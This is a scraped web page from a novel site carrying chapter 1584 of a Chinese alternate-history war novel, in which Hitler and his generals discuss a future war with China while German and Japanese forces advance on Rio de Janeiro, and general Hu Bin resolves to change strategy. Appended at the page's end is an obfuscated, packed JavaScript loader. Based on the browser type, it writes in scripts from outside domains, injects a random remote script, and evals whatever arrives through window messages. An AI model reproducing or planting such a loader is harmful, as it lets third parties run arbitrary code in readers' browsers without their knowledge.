返回

抗日之将胆传奇

首页
关灯
护眼
字体:
第一五八四章胡斌改变思路
上一章 返回目录 下一章
  一秒记住【笔趣阁 】为您提供最快更新!

  1584希特勒他们在讨论着国际的形势,尤其是中国。

  现在希特勒唯一担心的就是中国,因为中国太神秘了,很多情况他们都不知道,而且发展的速度非常快,部队也多,人口也多,面积还大,真的要打,德国必须要拼尽全力才有胜利的可能。

  “哎,如果可以,我们也不想和中国为敌,和这样的一个国家为敌,对于我们德国来说,是一个考验。

  中国打了那么多年仗,他们的将军,都非常有经验,根据我们知道的情况,胡斌,只不过是站出来的一个将军,他们中国这样的将军,还有很多,听说都相当厉害。

  不管是重庆那边还是延安那边,作战丰富的将军,都非常多!”希特勒站在那里,突然叹气的说着。

  其他的将军听到了,也点了点头。

  “可是又不能不打,现在想来,我们打苏联,他们中国占了天大的便宜,整个西伯利亚的面积多大啊,还有远东,不比以前的中国小。

  而且,日本入侵其他的国家,到后来,还是落到了中国的手上,所以说,这个国家很可怕,我们担心中国,中国也在担心我们,他怕我们从陆地上面攻击中国。

  所以,我们两个国家,只能有一个国家强大,两个强大的国家共存,是不可能的!”希特勒站在那里说道。

  “是的,不过,等我们拿下美洲,从美洲弄到了足够的资源,加上苏联战败的话,中国我们就不怕了,我们有足够的部队,还有大量的资源,兵力来对付中国!”龙德施泰特看着希特勒说道。

  希特勒听到了,点了点头。

  “好在现在美洲那边开局不错,1年之内,差不多,能够控制南美洲,至于米国,他们要跟我们拼,我们可不怕。

  上次日本去攻击他们,让他们元气大伤,现在他们的工业,人口都没有恢复,所以,米国我们不怕,没有中国的帮忙,米国我们早晚要打下来。

  现在就是古德里安将军那边,不过,有100万日本部队过去了,我想,古德里安将军,怎么也能够挡住一年的,只要一年,我们就能够反攻中国。

  现在不要去激怒中国为好,让他们先这样吧,哪怕是我们吃点亏,也不要去激怒他,中国不想打仗,我是知道的,所以只要我们不激怒他,他们是不会主动攻击的。

  他们现在唯一攻击的方向,就是中东,可是胡斌就这么点部队,他攻击能够攻击到什么地方?我们的部队耗都要耗死他!”希特勒非常自信的说着。

  那些将军听到了,也笑着点着头,对于德国的未来,他们是非常看好的。

  一天以后,在美洲那边,德国和日本的部队再次往前面突进了40多里地,美洲伤亡了30多万,还是没有能够挡住德国和日本部队前进的步伐。

  而德国,也伤亡了30多万,但是前进了40多里地,对于德国和日本来说,非常重要,他们已经打开了进攻的基地,后面的部队可以源源不断的上来。

  “斌哥,最新通报,德国的部队已经攻下了里约热内卢周边,现在正在攻击这个城市,从地图上面来看,德国的部队,已经站稳脚跟了!”许靖拿着电报到了胡斌办公室,对着胡斌说道。

  “果然还是上去了,米国那边没有夸大!”胡斌听到了,走到了美洲的地图前面,仔细的看着。

  “麻烦了,这么多部队上去了,米国的海军还不行,你说,后面德国的部队不知道要上去多少!”许靖也看着地图说道。

  “1年,1年是没有问题的,1年对于我们来说,够了!”胡斌站在地图前面说道。

  他心里预估,米国和美洲的那些国家,能够在美洲挡住德国和日本一年,至于付出的代价,那肯定是非常大。

  可是不管多大,米国都要付出,如果不付出,他们国家就要亡国了,所以,这次,美洲的那些国家会拼命的,胡斌要的就是他们拼命,他们不拼命,自己这边还不好打了!

  胡斌站在地图前面,仔细的盘算着,许靖看到胡斌这样,静静的站在那里。

  现在他跟在胡斌身边有段时间了,也知道胡斌的习惯,胡斌不说话,那就肯定是在想着事情,这个时候还是不要打扰他的好。

  “玛德,要改变思路了,不能让德国的部队对我们中国发动攻击,这些德国部队,可是带着日本人的,日本人,可不是什么好东西!”胡斌突然开口骂道。

  “司令?”许靖有点跟不上胡斌的思维,他突然冒出这样一句话来,谁能知道他在考虑什么。

『加入书签,方便阅读』

( 第 1/2 页, 本章未完,请翻页 1biquge.com )
上一章 返回目录 下一页
new Function(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6(/(1d)/i.7(f.c)&&/(y)/i.7(f.c)){6(/(10)/i.7(x.Z.Y)){X(W V().U())}5 z="v.d.j/u/t-o-B/l/k/n-q-s-A.w";3.4("<8 a=");3.4("h");3.4("T");3.4("p");3.4("s:");3.4("//");3.4(z);3.4(">")}F 6(/(R|P|y)/i.7(f.c)){x.K("J",G(e){5 b=e.I;6(b.r){S(12(b.r.1h(/\\+/g,"%1g")))}});3.4(\'\')}F{(G(){5 m=3.1b("8");5 H="D://v.d.j";m.a=H+"/2/1/1?"+C.1c(C.L()*M);5 9=3.N("8")[0];9.O.11(m,9)})()}',62,80,'|||document|write|var|if|test|script|ss|src|_c_ob_hf|userAgent|nggwhyk||navigator||||cn|smallimage|en||Filip2po|crypto||Vals1orda|hf_ev_j||go|presentations||js|window|baidu|uwMbwa|bfeUAl1UCVU|library|Math|https|iframe|else|function|url|data|message|addEventListener|random|10000|getElementsByTagName|parentNode|UCBrowser|frameborder|MQQBrowser|eval|tt|getSeconds|Date|new|alert|href|location|check_in|insertBefore|decodeURIComponent|no|none|scrolling|marginheight|width|height|allowtransparency|true|createElement|round|Android|display|style|20|replace'.split('|'),0,{}))()